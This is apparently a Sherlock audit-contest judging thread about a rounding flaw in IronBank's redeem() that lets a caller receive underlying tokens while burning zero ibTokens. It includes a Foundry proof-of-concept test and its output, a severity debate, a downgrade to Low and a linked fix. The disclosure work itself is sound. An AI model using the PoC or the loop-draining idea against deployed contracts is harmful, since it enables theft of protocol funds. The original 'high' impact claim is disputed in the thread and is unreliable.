### ISSUE TITLE
Norah - Attacker Can Exploit IronBank's redeem() Function to Steal Funds from the Protocol

### ISSUE THREAD

**Issue by sherlock-admin** [sherlock-audit/2023-05-ironbank-judging#247]
Norah

high

# Attacker Can Exploit IronBank's redeem() Function to Steal Funds from the Protocol

## Summary
The vulnerability stems from a clever manipulation of the redeem amount, where attackers can set the redeem amount in such a way that the resulting `ibTokenAmount` becomes zero due to rounding errors. However, the `redeem()` function does not include a check to prevent redemption when the `ibTokenAmount` is zero. 
This oversight allows attackers to exploit the vulnerability by calling IronBank's `redeem()` with a carefully crafted redeem amount, causing the function to erroneously redeem the entire underlyingAmount without burning any `ibToken`.

## Vulnerability Detail

Consider the exchangeRate to be 100x1e18

  -   Now Any user calls the redeem function with an underlyingAmount of 99.

  -   Amount to of ibToken to burn will be calculated ,as per following formula :
 
  https://github.com/sherlock-audit/2023-05-ironbank/blob/main/ib-v2/src/protocol/pool/IronBank.sol#L426 

  -   In our case ibTokenAmount will be evaluated as 99x1e18 / 100x1e18 resulting in **zero**.

  -   As there is no check like 
  
  ```solidity
                            if (ibTokenAmount == 0) { revert  ZeroRedeemNotAllowed(); }
   ```

  -   Users will get 99 amount of underlying **without burning any of their ibToken**.

Also, since there is no check whether the user has enough IBToken or not, anyone can call this function, no need to be even an ibToken holder.

Attackers can use a loop in contract to steal as many underlying tokens as per the gas limit.

## POC

Run this test in current repo, as it uses common.t.sol extensively.

```solidity
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "./Common.t.sol";

contract RedeemTest is Test, Common {
    int256 internal constant market1Price = 1500e8;
    int256 internal constant market2Price = 1000e8;
    uint16 internal constant reserveFactor = 1000; // 10%
    uint16 internal constant collateralFactor = 8000; // 80%

    IronBank ib;
    MarketConfigurator configurator;
    CreditLimitManager creditLimitManager;
    FeedRegistry registry;
    PriceOracle oracle;

    ERC20Market market1;
    ERC20Market market2;
    IBToken ibToken1;
    IBToken ibToken2;

    address admin = address(64);
    address user1 = address(128);
    address user2 = address(256);

    function setUp() public {
        ib = createIronBank(admin);

        configurator = createMarketConfigurator(admin, ib);

        vm.prank(admin);
        ib.setMarketConfigurator(address(configurator));

        creditLimitManager = createCreditLimitManager(admin, ib);

        vm.prank(admin);
        ib.setCreditLimitManager(address(creditLimitManager));

        TripleSlopeRateModel irm = createDefaultIRM();

        (market1, ibToken1,) = createAndListERC20Market(18, admin, ib, configurator, irm, reserveFactor);
        (market2, ibToken2,) = createAndListERC20Market(18, admin, ib, configurator, irm, reserveFactor);

        registry = createRegistry();
        oracle = createPriceOracle(admin, address(registry));

        vm.prank(admin);
        ib.setPriceOracle(address(oracle));

        setPriceForMarket(oracle, registry, admin, address(market1), address(market1), Denominations.USD, market1Price);
        setPriceForMarket(oracle, registry, admin, address(market2), address(market2), Denominations.USD, market2Price);

        configureMarketAsCollateral(admin, configurator, address(market1), collateralFactor);
        configureMarketAsCollateral(admin, configurator, address(market2), collateralFactor);

        deal(address(market1), user1, 100e18);
        //deal(address(market1), user2, 100e18);
        deal(address(market2), user2, 100e18);
    }

    function testRedeemZeroIbToken() public {

        //Just adding liquidity to market1 , so that user 2 can borrow and eventually help in increasing exchangeRate via interest accrued
        vm.startPrank(admin);
        market1.approve(address(ib), 100e18);
        ib.supply(admin, admin, address(market1), 5e18);
        vm.stopPrank();
        
        //User2 borrowing asset in market
        vm.startPrank(user2);
        market2.approve(address(ib), 100e18);
        ib.supply(user2, user2, address(market2), 10e18);
        ib.borrow(user2, user2, address(market1), 3e18);
        vm.stopPrank();

        //After 1 day of interest accrued on supplied asset, excahnge rate is more than initial rate of 1.
        //As far exchange rate is more than 1, it can be exploited, more the better.
        
        fastForwardTime(8640); // 1 Day

        //Now the Attacker (User1) just simply calls redeem() with 1 as argument
        uint256 redeemAmount = 1;
        
        uint256 Underlying_balance_before_redeem = market1.balanceOf(user1);
        uint256 IBToken_balance_before_redeem = ibToken1.balanceOf(user1);

        vm.prank(user1);
        ib.redeem(user1, user1, address(market1), redeemAmount);

        uint256 Underlying_balance_after_redeem = market1.balanceOf(user1);
        uint256 IBToken_balance_after_redeem = ibToken1.balanceOf(user1);

        uint256 Underlying_Gain =Underlying_balance_after_redeem - Underlying_balance_before_redeem;
        uint256 IBToken_loss = IBToken_balance_after_redeem - IBToken_balance_before_redeem;

        console.log('Underlying_Gain : %d',Underlying_Gain);
        console.log('IBToken_loss : %d',IBToken_loss);

        assertEq(IBToken_loss, 0);
        assertEq(Underlying_Gain, 1);

    }

}

```
Output : 

```solidity
Logs:
  Underlying_Gain : 1
  IBToken_loss : 0
```

## Impact
Loss of user and protocol funds

## Code Snippet

  https://github.com/sherlock-audit/2023-05-ironbank/blob/main/ib-v2/src/protocol/pool/IronBank.sol#L399-L451

## Tool used
Foundry
Manual Review

## Recommendation
Implement following check in redeem() : 

  ```solidity
                   if (ibTokenAmount == 0) { revert  ZeroRedeemNotAllowed(); }
  ```

**Comment by norah1499** [comment]
Escalate for 10 USDC

I do not know why this was excluded, above write-up is suffice to explain the issue in my opinion.
Please re-consider the issue and provide some sort of explanation if you still think it is invalid.

**Comment by ibsunhub** [comment]
We acknowledge this issue. However, there are certain conditions that need to be met for this vulnerability to be profitable.

1. The exchange rate is not the initial value.
2. The decimals of the underlying token is very small.
3. The unit value is high.

In one transaction, the attacker could use for loop to drain 1000 wei of the underlying token without burning any ibToken. This transaction will probably consume 10m gas (~0.2 ETH for 20Gwei gas price). If the value of 1000 wei of the underlying token is larger than 0.2 ETH, it's profitable.

**Comment by 0xffff11** [comment]
I can see the issue as a medium. Certain conditions have to be met for this to happen, but watson and sponsor described them and they are not impossible to reach.

**Comment by ibsunhub** [comment]
Agree to the severity. Thanks for the finding.

**Comment by iamjakethehuman** [comment]
This is invalid. Exchange rate is scaled in the [underlying's decimals ](https://github.com/sherlock-audit/2023-05-ironbank-iamjakethehuman/blob/main/ib-v2/src/protocol/pool/MarketConfigurator.sol#L504)
Therefore, the following line will return a non-zero value if said token has <18 decimals (e.g. WBTC in watson's example) : `ibTokenAmount = (amount * 1e18) / _getExchangeRate(m);` (99 * 1e18 / 100e8)

**Comment by 0xffff11** [comment]
Issue has to be re-checked according to a watsons comments: 

'''
the only realistic case in which a user can redeem any tokens for free would be if the underlying token is in 1e18, and the IBToken has jumped significantly in value (e.g. if 1 ibToken = 2 underlying, a user could redeem for free a max of 1 wei, if ibToken = 100 underlying, the user could redeem for free a max of 99 wei, etc)
Considering the case where the price of ibtoken has gone 100x (which is unrealistic by itself) the user could redeem a max of 99 wei of a token which consists of 18 decimals. There is not a single token where this would be worth the gas fees on any chain
'''
@ibsunhub does the claims from the watson make sense?

**Comment by chrisckwong821** [comment]
didnt escalate; but basically a duplicate of this issue: https://github.com/sherlock-audit/2023-05-ironbank-judging/issues/234

**Comment by ibsunhub** [comment]
The @iamjakethehuman is right. The exchange rate kinda has the same decimals as the underlying and ibToken always has 18 decimals. Therefore, the rounding issue will only happen when the underlying has 18 decimals, which is very negligible. Although we will still fix it to avoid zero ibToken redemption, the severity is quite low imo.

**Comment by ibsunhub** [comment]
fix: https://github.com/ibdotxyz/ib-v2/pull/62

**Comment by hrishibhat** [comment]
Result:
Low
Unique
Considering this a low issue based on above comments

**Comment by sherlock-admin** [comment]
Escalations have been resolved successfully!

Escalation status:
- [norah1499](https://github.com/sherlock-audit/2023-05-ironbank-judging/issues/247/#issuecomment-1606581000): rejected

**Comment by IAm0x52** [comment]
Fix looks good. User can no longer supply or redeem 0 tokens
